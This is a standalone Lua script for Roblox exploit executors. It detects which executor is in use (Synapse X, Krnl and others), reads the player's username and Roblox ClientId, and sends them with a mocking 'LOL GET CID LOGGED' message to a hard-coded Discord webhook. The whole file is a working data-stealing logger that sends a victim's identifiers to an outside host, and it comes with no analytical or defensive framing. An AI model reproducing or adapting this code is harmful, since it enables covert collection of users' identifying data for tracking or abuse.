local ec = is_sirhurt_closure and "Sirhurt" or pebc_execute and "ProtoSmasher" or syn and "Synapse X" or secure_load and "Sentinel" or KRNL_LOADED and "Krnl" or SONA_LOADED and "Sona" or "Kid with shit exploit"
local g = game
local cid = g:GetService("RbxAnalyticsService"):GetClientId()
local wurl = "https://discord.com/api/webhooks/966936459514875935/6h9ottG8PsqkU3AjOzRTlzNCNznvLxc1xJILneQ45NHEqo5ipfgAxtCTTPmOp_MMHYhY"
local d = {
    ["content"] = "LOL GET CID LOGGED",
    ["embeds"] = {
        {
            ["title"] = "**Username: " .. game.Players.LocalPlayer.Name.." **",
            ["description"] = "ClientId: " .. cid.." with **"..ec.."**",
            ["type"] = "rich",
            ["color"] = tonumber(0x7269da),
            ["image"] = {
                ["url"] = "http://www.roblox.com/Thumbs/Avatar.ashx?x=150&y=150&Format=Png&username=" ..
                    tostring(game:GetService("Players").LocalPlayer.Name)
            }
        }
    }
}
local nd = g:GetService("HttpService"):JSONEncode(d)
local h = {
    ["content-type"] = "application/json"
}
local m = "POST"
local p = {
    Url = wurl,
    Body = nd,
    Method = m,
    Headers = h
}
local r = http_request or request or HttpPost or syn.request
r(p)
